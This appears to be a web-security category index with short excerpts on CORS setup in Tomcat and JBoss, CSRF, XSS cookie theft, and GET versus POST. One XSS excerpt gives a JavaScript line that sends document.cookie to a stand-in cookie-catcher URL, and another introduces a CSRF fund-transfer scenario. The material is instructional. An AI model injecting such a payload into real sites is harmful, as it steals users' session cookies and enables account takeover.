Category: Web

What is CORS and how is it used

Let’s say we wanted to provide a service at http://orlandotemp.net/temp that responds to AJAX GET requests from the external site example.com with a JSON object containing the current temperature in Orlando, FL. All we need to do to enable this...

How to enable CORS in Tomcat and JBOSS

For JBoss we can use a solution from thetransactioncompany: web.xml: maven: If you use Apache Tomcat, you can use the built-in CorsFilter: web.xml: pom.xml:

How to make CSRF attack using POST request

Imagine if www.example.com processed fund transfers through a GET request that will include two parameters: the amount that is to be transferred and the identifier of the account to which the money will be...

How to steal user cookies using XSS attack

We know that it is possible to steal the cookie by redirecting to a “false” page, etc., like this: document.location = "http://www.example.com/cookie_catcher.php?c=" + document.cookie But how can it be done without redirecting the user? If you have full...

GET vs POST request. Why POST is more secured?

The GET request is marginally less secure than the POST request. Neither offers true “security” by itself; using POST requests will not magically make your website secure against malicious attacks by a noticeable amount. However, using...